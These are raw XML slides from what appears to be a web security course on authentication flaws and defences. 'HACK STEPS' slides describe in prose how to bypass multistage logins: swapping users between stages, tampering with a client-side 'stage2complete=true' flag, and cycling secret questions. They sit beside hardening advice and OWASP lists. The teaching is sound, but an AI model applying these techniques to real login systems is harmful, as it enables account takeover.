          <p:cNvPr id="1545" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="448887" indent="-448887">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If any data is submitted more than once, try submitting a different value at different stages, and see whether the login is still successful. It may be that some of the submissions are superfluous and are not actually processed by the application. It might be that the data is validated at one stage and then trusted subsequently — in this instance, try to provide the credentials of one user at one stage, and then switch at the next to actually authenticate as a different user. It might be that the same piece of data is validated at more than one stage, but against different checks — in this instance, try to provide (for example) the username and password of one user at the first stage, and the username and PIN number of a different user at the second stage.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="448887" indent="-448887">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>Pay close attention to any data being transmitted via the client that was not directly entered by the user. This may be used by the application to store information about the state of the login progress, and may be trusted by the application. For example, if the request for stage three includes the parameter “stage2complete=true” then it may be possible to advance straight to stage three by setting this value. Try to modify the values being submitted and determine whether this enables you to advance or skip stages.</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7" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1548" name="Attackers may be able to break the “secret” questions on logins by:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="4000"/>
            </a:pPr>
            <a:r>
              <a:t>Attackers may be able to break the “secret” questions on logins by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="839585" indent="-473825">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:t>Discovery of question and answer within a hidden HTML form field or cookie</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="839585" indent="-473825">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3800"/>
            </a:pPr>
            <a:r>
              <a:t>Cycling through questions until they arrive at one which they know the answer to</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0" name="Defects in Multistage Login Mechanisms"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defects in Multistage Login Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1551" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="438912" indent="-438912">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If one of the login stages uses a randomly varying question, verify whether the details of the question are being submitted together with the answer. If so, change the question, and submit the correct answer associated with that question, and verify whether the login is still successful.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="438912" indent="-438912">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If the application does not enable an attacker to submit an arbitrary question and answer, perform a partial login several times with a single account, proceeding each time as far as the varying question. If the question changes on each occasion, then an attacker can still effectively choose which question to answer.</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3" name="Insecure Storage of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Insecure Storage of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1554" name="It is very common to encounter web applications in which user credentials are stored in unencrypted form within the database.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014052"/>
            <a:ext cx="8812666" cy="5439067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="598516" indent="-598516">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>It is very common to encounter web applications in which user credentials are stored in unencrypted form within the database.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:pPr>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="598516" indent="-598516">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Review the entire authentication-related functionality of the application, and also any functions relating to user maintenance. If any instances are found in which a user’s password is transmitted back to the client, then this may indicate that passwords are being stored in an insecure manner.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="598516" indent="-598516">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If any kind of arbitrary command or query execution vulnerability is identified within the application, attempt to find the location within the application’s database or file system where user credentials are stored. Query these to determine whether passwords are being stored in unencrypted form.</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6" name="Securing Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456463" y="2552796"/>
            <a:ext cx="8140044" cy="2599951"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Securing Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1557" name="Need to counterbalance defense against threats with actual user-friendliness"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456461" y="5314306"/>
            <a:ext cx="8123990" cy="2167468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Need to counterbalance defense against threats with actual user-friendliness</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9" name="Using Strong Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Using Strong Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1560" name="Suitable minimum password quality requirements…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Suitable minimum password quality requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Minimum length; character, numbers; lower and upper case, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Unique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Non-sequenced and non-predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Allowance of longer passwords and wide range of characters  </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2" name="Handle Credentials Secretively"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Handle Credentials Secretively</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1563" name="Created using a well-established cryptographic technology, such as SSL…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>Created using a well-established cryptographic technology, such as SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>HTTP for unauthenticated areas and HTTPS for the login form itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>Credentials should never be placed in URL parameters or cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>All server-side application components should store credentials in a manner that does not allow their original values to be easily recovered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>“Remember me” functionality should in general only remember non-secret items such as usernames.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>Passwords should be changed periodically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="377190" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2200"/>
            </a:pPr>
            <a:r>
              <a:t>Drop down menus should be used in place of text fields for user’s login info in regards to hints and memorable words</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5" name="Validate Credentials Properly"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Validate Credentials Properly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1566" name="All authentication logic should be closely code-reviewed to identify logic errors such as fail-open conditions.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>All authentication logic should be closely code-reviewed to identify logic errors such as fail-open conditions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Multistage logins should</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="753035" indent="-387275">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Not allows users to enter the same information more than once or change it once the page was been processed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="753035" indent="-387275">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>The first task carried out at every stage should be to verify that all prior stages have been correctly completed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>To prevent information leakage about which stage of the login failed, the application should always proceed through all stages of the login, even if the user has failed to complete earlier stages correctly, and even if the original username was invalid.</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8" name="Validate Credentials Properly"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Validate Credentials Properly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1569" name="Ensure that an attacker is not able to effectively choose his own question in the random varying question process…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Ensure that an attacker is not able to effectively choose his own question in the random varying question process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>First user should identify themselves, then have the question at a later stage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Validate saved answers versus saved questions</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1" name="Prevent Information Leakage"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Information Leakage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1572" name="An attacker should have no means of determining which piece of the various items submitted has caused a problem.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>An attacker should have no means of determining which piece of the various items submitted has caused a problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A single code component should be responsible for responding to all failed login attempts, with a generic message.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7" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Daniel of Service"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226090" y="1414953"/>
            <a:ext cx="356981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Daniel of Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767063" y="3766346"/>
            <a:ext cx="378366" cy="345359"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId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631" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2408118" y="2725087"/>
            <a:ext cx="378365" cy="345360"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId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632" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850217" y="5564227"/>
            <a:ext cx="378366" cy="345360"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId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633" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4309934" y="5265370"/>
            <a:ext cx="378366" cy="345360"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId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4" name="Prevent Brute-Force Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prevent Brute-Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1575" name="Measures should be taken to prevent attacks via automation such as the use of unpredictable usernames.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Measures should be taken to prevent attacks via automation such as the use of unpredictable usernames.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A more balanced policy, suitable for most security-aware applications, is to suspend accounts for a short period (e.g., 30 minutes) following a small number of failed login attempts (e.g., three). </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>slows down password guessing attacks</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7" name="Prevent Brute-Force Attacks"/>
